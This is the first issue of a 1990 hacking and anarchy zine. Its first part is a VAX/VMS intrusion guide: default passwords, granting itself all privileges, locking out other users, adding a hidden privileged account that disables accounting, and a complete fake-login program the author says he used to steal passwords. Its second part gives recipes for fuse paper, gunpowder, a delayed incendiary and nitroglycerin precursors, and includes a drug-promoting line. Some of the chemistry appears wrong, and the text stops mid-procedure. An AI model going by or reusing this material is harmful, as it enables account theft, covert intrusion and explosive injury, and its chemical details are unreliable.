home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / a_m / elektrix.1 < prev    next >
Encoding:
Text File  |  2003-06-11  |  84.4 KB  |  1,929 lines

  1.  ----------------------------------------------------------------------------
  2. |                                                                            |
  3. |              The Supreme Seven [S7] proudly present...                     |
  4. |                                                                            |
  5. |                         ELEKTRIX Issue 1                                   |
  6. |                                                                            |
  7. |                Released May 1990 - Issue 2 in July                         |
  8. |                                                                            |
  9. |                                                                            |
  10. |  HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS  |
  11. |                                                                            |
  12. |                                                                            |
  13. | You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor]  |
  14.  ----------------------------------------------------------------------------
  15.  
  16.   Disclaimer: In no event  shall Palm Beach be liable to anyone for special,
  17.   collateral, incidental,  or consequential  damages  in  connection with or
  18.   arising out of  the use of the information  within this  magazine and sole
  19.   and exclusive  liability to Palm  Beach, regardless of any form of action,
  20.   shall  not exceed the  purchase price of  this magazine (which since it is
  21.   nothing means  we don't owe u  nowt!). Moreover,  Palm Beach shall  not be
  22.   liable for any claim of any kind whatsoever against the user of these text
  23.   materials  by any other  party. Palm Beach  makes no warranty, either exp-
  24.   ressed or implied, including but not  limited to any implied warranties of
  25.   merchantability and  fitness for particular  purpose, regarding these text
  26.   materials and makes such materials available solely on an 'as-is' basis.
  27.   Now that that's over with - PARTY!
  28.  
  29.      Well now, this is the first issue of many ELEKTRIX newsletters covering
  30.   such topics as  COMPUTER SECURITY, HACKING,  PHREAKING, SAT DECODING, RTTY
  31.   ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES,
  32.   PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD.
  33.      In this issue there  are articles on  Hacking, Phreaking, Pyrotechnics,
  34.   anarchy and  electronic surveillance. The  newsletter is bi-monthly and so
  35.   the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at
  36.   any of these boards around the world:
  37.  
  38.                   HACKERNET (UK) ++44(532)-557739
  39.                 PALM BEACH BB (UK) ++44(303)-265979
  40.              THE LIMELIGHT BBS (USA)  0101-203-834-0367
  41.             THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE)
  42.  
  43.       If you have an article or some information which you would like to see
  44.   put to use in the next  issue then you can contact us at Palm Beach BBS UK.
  45.   Please send all e-mail to Deceptor. Higher priviledges available to hackers
  46.   , phreakers, etc. You can contact S7 at these places too:
  47.  
  48.                     TCHH - Maxhack/Deceptor/Pop
  49.                      QSD - Alex/Maxhack/Deceptor
  50.                    GHOST - Mail to S7/Deceptor
  51.  
  52.  
  53.   ■ Part 1  -  Hacking VMS - UAF / False Logon programs, etc.    /  Pling Wiz
  54.  
  55.   ■ Part 2  -  The Anarchists guide to...pyrotechnics & mischief /  Deceptor
  56.  
  57.   ■ Part 3  -  An guide to modern electronic surveillance        /  Technic
  58.  
  59.   ■ Part 4  -  Make your own tonepad for phone box phreaking     /  Maxhack
  60.  
  61.   ■ Part 5  -  Freefone interrogation.....The ultimate in lists. /  Agent 7
  62.  
  63.  
  64.  ---------------------- ELEKTRIX ISSUE 1: MAY 1990 ---------------------------
  65.  
  66.  
  67.  ----------------------------------------------------------------------------
  68. |                                                                            |
  69. |                      ELEKTRIX Issue 1 - Part 1                             |
  70. |                      ~~~~~~~~~~~~~~~~~~~~~~~~~                             |
  71. |                                                                            |
  72. |              Hacking VAX/VMS + The User Authorisation File                 |
  73. |                           By Pling Wiz                                     |
  74. |                                                                            |
  75. |                  PALM BEACH BBS UK ++44(303)-265979                        |
  76. |                                                                            |
  77.  ----------------------------------------------------------------------------
  78.  
  79.  
  80.  
  81. INTRODUCTION
  82.  
  83. The VAX is made by DEC (Digital Equipment Corp) and can run a variety
  84. of operating systems. In this file i will talk about the VMS (Virtual
  85. Memory Operating System), VMS also runs on the PDP-11, both mainframes
  86. are 32 bit machines with 32 bit virtual address space.
  87.  
  88. ENTRANCE:
  89.  
  90. When you first connect to a VAX you type either a return, a ctrl-c or
  91. a ctrl-y. It will then respond with something similar to this:
  92.  
  93. USERNAME:
  94. PASSWORD:
  95.  
  96. The most frequent way of gaining access to a computer is by using a
  97. 'default' password, this by the way is not very successful.......
  98. When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
  99. which are:
  100.  
  101. DEFAULT : This serves as a template in creating user records in the
  102.           UAF (User Authorization File). A new user record is assigned
  103.           the values of the default record except where the system
  104.           manager changes those values. The default record can be
  105.           modified but can not be deleted from the UAF.....
  106.  
  107. SYSTEM : Provides a means for the system manager to log in with full
  108.          privileges.  The SYSTEM record can be modified but cannot be
  109.          deleted from the UAF.......
  110.  
  111. FIELD  : Permits DIGITAL field service personnel to check out a new
  112.          system.  The FIELD record can be deleted once the system is
  113.          installed.
  114.  
  115. SYSTEST: Provides an appropriate environment for running the User
  116.          Environment Test Package (UETP). The SYSTEST record can be
  117.          deleted once the system is installed.
  118.  
  119. Usually the SYSTEM MANAGER adds,deletes, and modifies these records
  120. which are in the UAF when the system arrives, thus eliminating the
  121. default passwords, but this is not always the case.....
  122. some default passwords which have been used to get in a system are....
  123.  
  124.  USERNAME                   PASSWORD
  125.  
  126.  SYSTEM                     MANAGER or OPERATOR
  127.  FIELD                      SERVICE or TEST
  128.  DEFAULT                    USER or DEFAULT
  129.  SYSTEST                    UETP or SYSTEST
  130.  
  131. Other typical VMS accounts are :
  132. VAX
  133. VMS
  134. DCL
  135. DEMO
  136. GUEST
  137. GENERAL
  138. TEST
  139. HELP
  140. GAMES
  141. DECNET
  142.  
  143. Or a combination of the various usernames and passwords. If none of
  144. these get you in , then you should try another system unless you have
  145. away of getting an account either by trashing or other means.....
  146.  
  147. YOUR IN!!!!!!
  148.  
  149. You will know that you are in by receiving the prompt of a dollar sign
  150. ($). You will be popped into the default directory which is dependent
  151. on what account you logged in as. If you get in as system manager
  152. (highly unlikely) you have full access....
  153. If you get the FIELD or SYSTEST account , you may or may not have full
  154. access, but you may have the privileges to give your self full access.
  155.  
  156. To give privs to yourself:
  157.  
  158. $ SET PROCESS/PRIVS=ALL
  159.  
  160. The VMS system has full help files available by typing HELP. You can
  161. use the wildcard character of an '*' to list out info on every
  162. command:
  163. $ help *
  164.  
  165. When you first logon, it may be to your advantage to get a list of all
  166. users currently logged onto the system if there are any at all. You
  167. can do this by:
  168.  
  169. $ SHOW USERS
  170.  
  171. VAX/VMS Interactive Users-Total=4
  172. 01-may-1989  11:37:21.73
  173. 0PAO:    DEMO      004C004C
  174. TTD2:    FIELD     004E02FF
  175. TTD1:   SYSMAN     0043552E
  176. TXB3   TRTRTRRTR   01190057
  177.  
  178. It is highly recommended that if you are logged on in the day and
  179. there are people logged in, especially the system manager or the
  180. account you are logged on as appears twice.. log out straight away,
  181. and call back later. You do not want to call to late though as the
  182. system keeps a record of when each user logs in and out.
  183.  
  184. To communicate with other users or other hackers that are on the
  185. system, use the PHONE utility..
  186.  
  187. $ PHONE Username
  188.  
  189. If the system has DEC-NET you can see what available nodes there are
  190. by :
  191.  
  192. $ SHOW NETWORK
  193.  
  194. If you have mail the system will tell you as soon as you logon, simply
  195. type:
  196.  
  197. $ MAIL
  198.  
  199. This will invoke the Personal Mail Utility, you can then either read
  200. your mail or select help....
  201.  
  202. DIRECTORIES:
  203. To see what you have in your directory type:
  204.  
  205. $ DIR
  206.  
  207. To get a list of directories on the system type:
  208.  
  209. $ DIR *.*
  210.  
  211. When a VAX/VMS is first installed, it comes with 9 directories which
  212. are not listed when you execute the DIR *.* command:
  213.  
  214. <SYSLIB>
  215. This directory contains various macro and object libraries.
  216.  
  217. <SYSMSG>
  218. This directory contains files used in managing the operating system.
  219.  
  220. <SYSMGR>
  221. This directory contains text files and help libraries for the HELP
  222. library.
  223.  
  224. <SYSERR>
  225. This is the directory for the error log file (ERRLOG.SYS).
  226.  
  227. <SYSTEST>
  228. This directory contains files used in testing the functions of the
  229. operating system.
  230.  
  231. <SYSMAINT>
  232. This directory contains system diagnostic programs.
  233.  
  234. <SYSUPD>
  235. This directory contains filesused in applying system updates.
  236.  
  237. <SYSUPD.EXAMPLES>
  238. This directory contains sample driver programs, user-written system
  239. services, and other source programs.
  240.  
  241. <SYSEXE>
  242. This directory contains the executable images of most of the functions
  243. of the operating system.
  244. Inside these directoriesare files with the following file types:
  245.  
  246. File-Type:        Description:                        command:
  247. --------------------------------------------------------------------
  248. .hlp             system help file                    TYPE filename
  249. .dat             data file                           TYPE filename
  250. .msg             message file                        TYPE filename
  251. .doc             Documentation                       TYPE filename
  252. .log             LOG file                            TYPE filename
  253. .err             ERROR msg file                      TYPE filename
  254. .seq             sequential file                     TYPE filename
  255. .sys             system file                         FILE-NAME
  256. .exe             executable file                     FILE-NAME
  257. .com             command file                        COMMAND NAME
  258. .bas             basic file                          RUN file-name
  259. .txt             ascii text file                     TYPE filename
  260. --------------------------------------------------------------------
  261. There are others but you won't see them as much as the above. You can
  262. change the directories either by using the CHANGE command or by using
  263. the SET DEFAULT command:
  264.  
  265. $ CHANGE <DIR.NAM>
  266.       or
  267. $ SET DEFAULT <DIR.NAM>
  268.  
  269. You can now list and execute the files in this directory without first
  270. the directory name followed by the filename as long as you have
  271. sufficient access. If you don't have sufficient access you can still
  272. view files within directories that you cannot default to by:
  273.  
  274. $ TYPE <LOD.DIR> LOD.MAI;1
  275. This will list the contents of the file LOD.MAI;1 in the directory of
  276. <LOD.DIR>
  277.  
  278. The use of wildcards is very helpful when you desire to view all the
  279. mail or something on the system. To list out all the users mail if you
  280. have access type:
  281.  
  282. $TYPE <*.*>*.MAI;*
  283.  
  284. As you may have noticed mail files have the extension of MAI at the
  285. end. The ;1 or ;2 etc are used to number files with the same name.
  286.  
  287. PRIVILEGES
  288.  
  289. Privileges fall into 7 categories according to the damage that the
  290. user possessing them could cause to the system:
  291.  
  292. NONE   - No privileges
  293.  
  294. NORMAL - minimum privileges to use the system.
  295.  
  296. GROUP  - Potential to interfere with members of the same group.
  297.  
  298. DEVOUR - Potential to devour noncritical system-wide resources.
  299.  
  300. SYSTEM - Potential to interfere with normal system operation.
  301.  
  302. FILE   - Potential to comprimise file security.
  303.  
  304. ALL    - Potential to control the system (wouldn't that be good ahah).
  305.  
  306. THE UAF
  307.  
  308. The User Authorization File contains the names of the users who may
  309. log into the system and also contains a record of the users
  310. privileges. Each record in the UAF includes the following:
  311.  
  312. 1. Name and Password.
  313. 2. User Identification Code(UIC)-- Identifies a user by a group number
  314.    and a member number.
  315. 3. Default file specification --- Has the default device and directory
  316.    names for file access.
  317. 4. Login command file --- Names a command procedure to be executed
  318.    automatically at login time.
  319. 5. Login flags --- Allows the system manager to inhibit the user of
  320.    the ctrl-y functions and lock user passwords.
  321. 6. Priority ---- Specifies the base priority of the process created
  322.    by the user at login time.
  323. 7. Resources --- Limits the system resources the user may perform.
  324. 8. Privileges --- Limits the activities the user may perform.
  325.  
  326. If you have SYSTEM MANAGER privileges, you will be able to add,delete,
  327. and modify records in the UAF.
  328.  
  329. The AUTHORIZE Utility allows you to modify the information in the UAF.
  330. It is usually found in the SYSEXE directory.
  331. The commands for AUTHORIZE are:
  332. ADD Username  <qualifier..> Adds a record to the UAF.
  333. EXIT (or CTRL-Z) Returns you to command level.
  334. HELP Lists the AUTHORIZE commands.
  335. LIST <Userspec></FULL> Creates a listing file of UAF records.
  336. MODIFY Username  Modifies a record.
  337. REMOVE Username  deletes a record.
  338. SHOW     Displays UAF records.
  339.  
  340. The most useful besides ADD is the SHOW command. SHOW displays reports
  341. for selected UAF records. YOU can get a /BRIEF listing of a /FULL
  342. listing. BUT before you do that, you may want to make sure no one is
  343. logged on besides you,to make sure know one can log on type the
  344. following:
  345.  
  346. $ SET LOGINS /INTERACTIVE=0
  347.  
  348. This establishes the max number of users able to log in to the system,
  349. this command does not affect users currently logged on.
  350.  
  351. To list out the userfile do the following:
  352.  
  353. $ SET  DEFAULT <SYSEXE>
  354. $ RUN AUTHORIZE
  355. UAF> SHOW * /BRIEF
  356.  
  357. UAF
  358. Unfortunately you cannot get a listing of passwords,though you can get
  359. a listing of all the users as shown above... The passwords are
  360. encrypted just like the unix systems.
  361. If you have sufficient privs you can create your own account.........
  362.  
  363. UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
  364. /DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
  365. /OWNER=DIGITAL /NOACCOUNTING
  366.  
  367. 1. ADD USERNAME
  368. 2. SPECIFY THE PASSWORD YOU WANT TO USE....
  369. 3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
  370.    COMMAND ENCLOSED IN BRACKETS....
  371. 4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
  372. 5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
  373.    OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
  374. 6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
  375. 7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
  376. 8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
  377.    RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
  378.  
  379.  
  380. LOGGING OFF
  381.    Simply type:
  382.     $ LOGOUT
  383.  
  384.  
  385.   BYPASSING THE UAF...
  386.   =====================
  387.  
  388.  
  389.   The preferred method of breaking into a locked system is to set the alternat
  390.   UAF. This method requires setting the system parameter UAFALTERNATE, which
  391.   defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA
  392.   If this file is found during a normal login, the system uses it to validate
  393.   the account and prompts you for the username and password.
  394.   If this file is not located, the system assumes that the UAF is corrupt and
  395.   accepts any username and password to log you into the system from the system
  396.   console. Logins are prohibited from all other locations.
  397.  
  398.   NOTE: You can only use this method to log into the system from the console
  399.         terminal; you cannot use the other terminal lines.
  400.  
  401.   To set the alternate UAF ,use the following procedure:
  402.  
  403.   1: Perform a conversational boot..
  404.   2: When the SYSBOOT > prompt appears, enter the following
  405.      SYSBOOT > SET UAFALTERNATE 1 <cr>
  406.   3: Type CONTINUE and press <cr>
  407.   4: When the start up procedure completes, log in on the console terminal by
  408.      entering any username and password when asked to..
  409.  
  410.   The system assigns the following values to your user account:
  411.  
  412.   NAME.................. Username.
  413.   UIC................... [001,004].
  414.   COMMAND INTERPRETER... DCL.
  415.   LOGIN FLAGS........... None.
  416.   PRIORITY.............. Value of system parameter (DEFPRI).
  417.   RESOURCES............. Value of the PQL system parameters.
  418.   PRIVILEGES............ ALL.
  419.  
  420.   The process name is usually the name of the device on which you logged in
  421.   EG opa0..
  422.  
  423.   5: Fix the problem that caused you to be locked out of the system. That is,
  424.      make the necessary repairs to the UAF or to the start up or login
  425.      procedures . (If you modify a login or startup procedure and the problem
  426.      is still not solved, restore procedure to its previous state.
  427.  
  428.   If the problem is a forgotten password, reset the UAFALTERNATE system param
  429.   to 0, as explained in the next step. Then enter the authorize utility and
  430.   then type HELP MODIFY for info on modifying passwords...
  431.  
  432.   6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN
  433.      commands. To run SYSGEN, enter the following commands at the DCL prompt:
  434.  
  435.      $ RUN SYS$SYSTEM:SYSGEN <CR>
  436.  
  437.      The SYSGEN prompt is then displayed, then enter the following commands:
  438.  
  439.      SYSGEN > SET UAFALTERNATE 0 <CR>
  440.      SYSGEN > WRITE CURRENT <CR>
  441.      SYSGEN > EXIT <CR>
  442.  
  443.   7: Shutdown and reboot the system.
  444.  
  445.   Emergency startup after modifying system paramaters.
  446.  
  447.   In some cases, modifying system parameters may cause the system to become
  448.   unbootable. If this occurs, use the following emergency startup procedure
  449.   to restore normal operation.....
  450.  
  451.   1: Perform a conversational boot....
  452.   2: When the SYSBOOT > prompt appears enter the following commands:
  453.      SYSBOOT > USE DEFAULT.PAR <CR>
  454.      SYSBOOT > CONTINUE <CR>
  455.   3: When the system finishes booting, review any changes you made to SYSGEN
  456.      parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.
  457.  
  458.  
  459.   BYPASSING STARTUP AND LOGIN
  460.   ===========================
  461.  
  462.   If the system does not complete the startup procedures or does not allow you
  463.   to log in , bypass the startup and login procedures by following these steps
  464.  
  465.   1: Perform a conversational boot..
  466.   2: define the console to be the startup procedure by entering the following
  467.      commands at the SYSBOOT > prompt:
  468.      SYSBOOT > SET/STARTUP OPA0:
  469.      Type continue and press <CR> in response to the next SYSBOOT > prompt.
  470.      Wait for the DCL prompt to return.....
  471.   3: Correct the error condition that caused the login failure. That is, make
  472.      the necessary repairs to the startup or login procedures, or to the UAF.
  473.      You may want to enter the following DCL commands because bypassing the
  474.      startup procedures leaves the system in a partially initialized state:
  475.  
  476.      $ SET NOON <CR>
  477.      $ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>
  478.  
  479.      Invoke a text editor to correct the startup or login procedure file. Note
  480.      that some system consoles may not supply a screen mode editor.
  481.  
  482.   4: Reset the startup procedure by invoking SYSGEN and entering the following
  483.      commands:
  484.  
  485.      $ RUN SYS$SYSTEM:SYSGEN <CR>
  486.      SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
  487.      SYSGEN > WRITE CURRENT <CR>
  488.      SYSGEN > EXIT <CR>
  489.  
  490.   5: Perform a normal startup by entering the following command:
  491.  
  492.      $ @SYS$SYSTEM:STARTUP <CR>
  493.  
  494.      To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from
  495.      any terminal and any priveleged account with the following DCL command:
  496.  
  497.      $ @SYS$SYSTEM:SHUTDOWN <CR>
  498.  
  499.  
  500.    EMERGENCY SHUTDOWN WITH OPCRASH
  501.    ===============================
  502.  
  503.    This describes how to halt the system immediately without performing any of
  504.    the functions that ensure an orderly shutdown. You use the OPCRASH procedur
  505.    only if SHUTDOWN.COM FAILS......
  506.  
  507.    To perform this procedure you must have CMKRNL privilege. You can enter the
  508.    commands from ANY terminal.
  509.  
  510.    1: Enter the following command to force an immediate shutdown of the system
  511.  
  512.       $ RUN SYS$SYSTEM:OPCRASH <CR>
  513.  
  514.    2: At the system console the following message is displayed
  515.       SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.
  516.  
  517.    3: Halt the system
  518.       e.g. emergency shutdown using opcrash...
  519.  
  520.       $ RUN SYS$SYSTEM:OPCRASH <CR>
  521.  
  522.    GENERAL MAINTENANCE OF THE UAF.
  523.    ===============================
  524.  
  525.    To disable an account use the following command:
  526.  
  527.    UAF > MODIFY  USERNAME/FLAGS=DISUSER <CR>
  528.  
  529.    The login flag disuser disables the account and prevents anyone from loggin
  530.    into the account.
  531.    To enable the account when it is needed, run AUTHORIZE and specify the
  532.    following command:
  533.  
  534.    UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>
  535.  
  536.  
  537.    MODIFYING A USER ACCOUNT.
  538.    =========================
  539.  
  540.    Use the AUTHORIZE command MODIFY to change any of the fields in an existing
  541.    user account. The following command is used to change a users password.
  542.  
  543.    UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>
  544.  
  545.  
  546.    LISTING USER ACCOUNTS.
  547.    ======================
  548.  
  549.    Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a
  550.    summary of all user records in the UAF, as follows:
  551.  
  552.    UAF > LIST <CR>
  553.  
  554.    %UAF-I-LSTMSG1, WRITING LISTING FILE
  555.    %UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.
  556.  
  557.    By default the LIST command produces a brief report containing the followin
  558.    info from the UAF:
  559.  
  560.    ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY,
  561.    DEFAULT DISK AND DIRECTORY.
  562.  
  563.    Use the /FULL qualifier to create a full report of all the info contained
  564.    within the UAF.....
  565.  
  566.  
  567.    ENABLING SECURITY ALARMS.
  568.    =========================
  569.  
  570.    To enable security auditing, specify the dcl command SET AUDIT in the
  571.    following format:
  572.  
  573.    $ SET AUDIT/ALARM/ENABLE = KEYWORD [...]
  574.  
  575.    Select the events to be audited by specifying one or more of the keywords
  576.    to the /ENABLE qualifier....
  577.  
  578.    ACL.......... Event requested by an acl on a file or global section..
  579.    ALL.......... All possible events..
  580.    AUDIT........ Execution of the SET AUDIT command..
  581.    AUTHORIZATION modifications to the system UAF file, network proxy,
  582.                  authorization file,rights database, or changes to system
  583.                  and user passwords..
  584.    BREAKIN...... Successful breakin attempt..
  585.    FILE ACCESS.. Selected types of access (privileged + non privileged) to
  586.                  files + global sections..
  587.    INSTALL...... Installation of images..
  588.    LOG FAILURE.. Failed login attempt..
  589.    LOGIN........ Successful login attempt..
  590.    MOUNT........ Volume mounts + dismounts..
  591.  
  592.  
  593.    ENABLING ALARM MESSAGES
  594.    =======================
  595.  
  596.    After you enable a security operator terminal, enable specific alarm events
  597.    with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the
  598.    security operator terminal when the selected events occur.
  599.  
  600.  
  601.    AUDIT REDUCTION FACILITY.
  602.    =========================
  603.  
  604.    If you have enabled security alarms, the operating system writes the
  605.    information about these alarms to the security operators log file. To
  606.    extract all of the security alarm info from the current operators log file
  607.    (SYS$MANAGER:OPERATOR.LOG) execute this command:
  608.  
  609.    $ @SYS$MANAGER:SECAUDIT <CR>
  610.  
  611.    Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the
  612.    records to a file, include the file spec with the /OUTPUT qualifier..
  613.    The following command writes the records to the file BREAKINS.DAT in the
  614.    user current directory..
  615.  
  616.  
  617.    $ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
  618.  
  619.  
  620.    SIMPLE DECOY PROGRAM
  621.    ~~~~~~~~~~~~~~~~~~~~
  622.  
  623.  This is a decoy program that runs on the vax/vms system..
  624.  It does work because i have used it at the local college of FE, to steal
  625.  passwords and accounts whilst working there....
  626.  
  627.  The program now follows:-
  628.  
  629.  $ clear
  630.  $ set term/noecho/notype
  631.  $ SYSNAM:=(nodename)
  632.  $begin:
  633.  $ read/error=begin/prompt="" sys$command ret
  634.  $ write sys$output ""
  635.  $ID:
  636.  $ wait 00:00:00.5
  637.  $ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
  638.  $ write sys$output ""
  639.  $ write sys$output ""
  640.  $ wait 00:00:01
  641.  $ set term/echo
  642.  $ askquest:
  643.  $ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
  644.  $ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
  645.  $ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
  646.  $ if quest .nes. "" then goto askpass
  647.  $eof:
  648.  $ write sys$output "Error reading command input"
  649.  $ write sys$output "End of file detected"
  650.  $ goto begin
  651.  $fail:
  652.  $ write sys$output "Error reading command input"
  653.  $ write sys$output "Timeout period expired"
  654.  $ goto begin
  655.  $askpass:
  656.  $ set term/noecho
  657.  $ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
  658.  $ set term/echo
  659.  $ open/write file data.dat
  660.  $ write file quest
  661.  $ write file pass
  662.  $ write file f$time()
  663.  $ close file
  664.  $ set term/lowercase
  665.  $ write sys$output "User authorization failure"
  666.  $ read/error=begin/prompt ="" sys$command ret
  667.  $ stop/id='f$getjpi("","PID")
  668.  
  669.  Notes about use...
  670.  
  671.  1... change the welcoming message of the program to what is actually seen
  672.       on your vax...
  673.  
  674.  2... why not put at the top of the program the logout procedure of someone
  675.       else.. because a blank screen looks a bit suspicious...
  676.       just copy the log out statement and put it between a sys$output command
  677.       in the program .. not forgetiing to take the clear command out haha
  678.  
  679.  
  680.  ------------------- Palm Beach BBS ++44(303)-265979 ------------------------
  681.  
  682.  ----------------------------------------------------------------------------
  683. |                                                                            |
  684. |                     ELEKTRIX Issue 1 - Part 2                              |
  685. |                     ~~~~~~~~~~~~~~~~~~~~~~~~~                              |
  686. |                                                                            |
  687. |            The Anarchists guide to...Pyrotechnic mischief                  |
  688. |                           by Deceptor                                      |
  689. |                                                                            |
  690. |                  PALM BEACH BB UK ++44(303)-265979                         |
  691. |                                                                            |
  692.  ----------------------------------------------------------------------------
  693.  
  694.       MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher!
  695.  
  696.  
  697.  Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists
  698.  guide to...'  This first file will contain basic information on pyrotechnics
  699.  and other 'bits n pieces' useful for a good laugh.
  700.  
  701.  In this file you will find information on how to make the following:
  702.  
  703.  Fuse Paper
  704.  Auto-Firelighters
  705.  Low-explosive: Gunpowder
  706.  Hi-explosive : Nitro-Glycerin
  707.  Hot Stuff
  708.  
  709.  
  710.  FUSE PAPER
  711.  
  712.  Useful for making the fuses for bangers (firecrackers) and other slow-burn
  713.  fuse applications.
  714.  
  715.  You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask
  716.                                   for some Sodium Chlorate weedkiller. You're
  717.                                   meant to be 18 by law but if you're not it
  718.                                   doesn't usually stop them selling you it.
  719.  
  720.                 Newspaper/Tracing Paper
  721.  
  722.  The Sodium Chlorate in the weedkiller is unlikely to be more than about 65%
  723.  pure - this is not a problem if you're not worried about how quickly it will
  724.  burn as fuse paper but if you are using the fuses in a lot of wind or are
  725.  going to through them as part of a firecracker you will have to concentrate
  726.  the Sodium Chlorate and remove impurities as much as possible beforehand as
  727.  follows:
  728.  
  729.     Make a saturated solution of the weedkiller (ie.dissolve as much of it
  730.     as you can in very hot water) then filter off any remaining crystals.
  731.     Then heat the solution very hot in a dish - then when crystals start
  732.     forming around the rim heat more gently and then leave to cool - after
  733.     some time u will have crystals with gunge all over them - wash them and
  734.     filter off any rubbish.
  735.  
  736.  This is really simple to make but quite effective...Just take the Sodium
  737.  Chlorate (pure or weedkiller) and then make a solution of it (put in water).
  738.  Then soak the paper in the water and leave to dry on a radiator.
  739.  
  740.  When the paper is dry it will burn with some loud pops and just as fusepaper
  741.  so you have made your own fuses. Now to put the fuses to work....(hehe)
  742.  
  743.  
  744.  
  745.  GUNPOWDER
  746.  
  747.    Gunpowder is great stuff - though not really as exciting as plastic or
  748.  high-explosive it can be good fun for fireworks, bangers and not so large
  749.  explosions.
  750.  
  751.  You will need: Sulphur     - Obtain this from your chemist. Yup! Just ask
  752.                               for 'flowers of sulphur' (what a stupid name
  753.                               for it!)
  754.  
  755.                 Carbon      - Best just to use crushed charcoal for this.
  756.  
  757.                 Potassium   - Get this from a gardenshop (ask for Saltpetre).
  758.                 Nitrate       Can also use Sodium Nitrate in 'Weedol weed-
  759.                               killer' - but not actually as good.
  760.  
  761.  Making gunpowder from this is just too easy.....Just grind each substance
  762.  until it is a fine powder....then mix them in the following ratio:
  763.  
  764.              Potassium Nitrate : Sulphur : Carbon
  765.                      1         :    3    :   7
  766.  
  767.  Once mixed well you have made gunpowder - pack it in a confined space - add
  768.  a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It
  769.  can be great fun. If you want to light the gunpowder with a short delay of
  770.  about twenty seconds or so without the need for matches or lighters then use
  771.  a FIRELIGHTER as shown next.
  772.  
  773.  
  774.  
  775.  FIRELIGHTER
  776.  
  777.  Not really much to this but useful for delayed firelighting with the use of
  778.  matches or lighting materials.
  779.  
  780.  You will need: Glycerin     - Get it from your kitchen/medicine drawer.
  781.  
  782.                 Potassium    - This is now more commonly referred to as
  783.                 Permanganate   potassium (vii) manganate and can be picked
  784.                                up at the chemist. If they ask you what you
  785.                                want it for just say 'water-purification'.
  786.  
  787.                 Sugar        - If you can't get this; you really are lame!
  788.  
  789.  Ok. Take the stuff separately in the following proportions:
  790.  
  791.              Glycerin : Potassium Permanganate : Sugar
  792.                 3     :          9             :   1
  793.  
  794.  Crush the sugar and the glycerin up real well (icing sugar works well) then
  795.  just pour the glycerin on top and watch - change the proportions a bit and
  796.  you can have some real fun - try putting a bit of Sulphur in! Hehehehe You
  797.  can also use this as a detonator for a low-explosives such as gunpowder as
  798.  it doesn't go out easily!!! Also if you get a lot of it and a good ratio it
  799.  can be used as a good smoke bomb for indoors since you can run off and it's
  800.  not going then a minute later there's sweet smoke * EVERYWHERE * and phuck
  801.  it doesn't set most smoke alarm detectors off!
  802.  
  803.  
  804.  
  805.  NITROGLYCERIN
  806.  
  807.  Contrary to what people may have told you:
  808.  
  809.  1) It's very easy to make (if you have the fractional distillation gear).
  810.  2) It doesn't blow up when you drop it - cos homemade isn't usually pure
  811.     enough.
  812.  
  813.  Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery
  814.                                      acid or crack open a battery (dumper
  815.                                      truck batteries are cool - can give 400
  816.                                      amps current output!!! Whew!) You can
  817.                                      sometimes get it at harbours.
  818.  
  819.                     Sodium Nitrate - Weedkiller - this time get the 'WEEDOL'
  820.                                      one with Sodium Nitrate in it or any one
  821.                                      with Sodium Nitrate.
  822.  
  823.                     Glycerin       - From kitchen as before.
  824.  
  825.  Now the thing with this is that in order to actually MAKE nitroglycerin you
  826.  will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The
  827.  sulphuric is easy to do - battery acid is roughly 69% pure - the rest being
  828.  water. The best way to get conc. sulphuric therefore is to heat the acid to
  829.  * VERY * hot (400 degrees plus) and then leave it for a long time until its
  830.  acidity increases a great deal (like well nasty!). Get a litre of Sulphuric
  831.  acid concentrated and store it in a glass bottle. [Wash yer hands too - its
  832.  not nice stuff].
  833.  
